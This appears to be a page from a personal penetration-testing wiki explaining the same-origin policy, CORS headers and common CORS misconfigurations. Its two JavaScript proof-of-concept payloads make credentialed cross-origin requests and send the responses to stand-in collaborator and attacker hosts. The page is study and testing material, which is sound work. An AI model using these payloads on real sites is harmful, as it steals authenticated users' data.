❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • Microsoft Azure
  • REST API - Bypasses and Privilege Escalations
  • Web Pentesting
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Token
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Browser Security Mechanisms
  • Same Origin Policy (SOP)
  • What's Origin
  • CORS headers
  • Pentesting CORS
  • Origin reflection
  • Null origin
  • Insecure protocol or subdomain
  • References

Was this helpful?

  1. Web Pentesting

CORS

Cross-Origin Resource Sharing (CORS) pentest notes

PreviousShell Fu - OnelinersNextSpecial Chars & NULL Bytes

Last updated 1 year ago

Was this helpful?

Browser Security Mechanisms

Cross-Origin Resource Sharing (CORS) is a policy to relax the Both CORS and SOP policies are browser security mechanisms that limit JavaScript runtime to access resources from different origins (or domains for simplicity).

Same Origin Policy (SOP)

Internally JavaScript can send a request to a different "domain", but the browser will block to pass the response back to the JavaScript's runtime. The rule is simple, the browser will block the response if JavaScript's origin differs from a resource origin.

The SOP has some exceptions which allow cross-domain resource access (out of the JavaScript runtime context). For example, it's allowed to load an image, a font, or a JavaScript source code from a different origin. Right, you can load a JavaScript code from a different origin, but when the JavaScript is executed the SOP will not hand over the response to the JavaScript runtime.

What's Origin

An origin is a term in browser security upon SOP and CORS decisions are made. The origin is a combination of protocol, domain (host), and port to identify a "source" of a particular resource. The origin can not be simply a domain because there can be multiple web applications on a single host, communicating on different ports and protocols.

When a user or a JavaScript makes a request to a specific URL, the browser adds HTTP header "Origin: protocol://domain:port" to inform a web server to adjust CORS headers. Regardless of whether the site supports CORS or not ...when a browser receives a response, it evaluates its origin and considers SOP and CORS rules.

CORS headers

The server can provide the following CORS headers to relax SOP

Access-Control-Allow-Origin: origin HTTP header defines which origin is allowed to access resources.

Access-Control-Allow-Credentials: true allows to accessing authenticated resources. A cookie or authorization header is added by a browser when JavaScript wants to access the resource.

Pentesting CORS

CORS attacks assume, there is a XSS vulnerability within the app and these CORS headers set: Access-Control-Allow-Origins: origin-value, Access-Control-Allow-Credentials:true,

The CORS misconfigurations account with reflected origin, null origin and insecure protocol/subdomain origin.

Origin reflection

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://domain/URI',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='https://burpcollaborator.domain/log?key='+this.responseText;
    };
</script>

Null origin

Insecure protocol or subdomain

XSS vulnerability exists in the app running on a subdomain.

<script>
    document.location="http://subdomain.domain/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://domain/sensitiveURI',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

References

Same Origin Policy (SOP).
https://portswigger.net/web-security/cors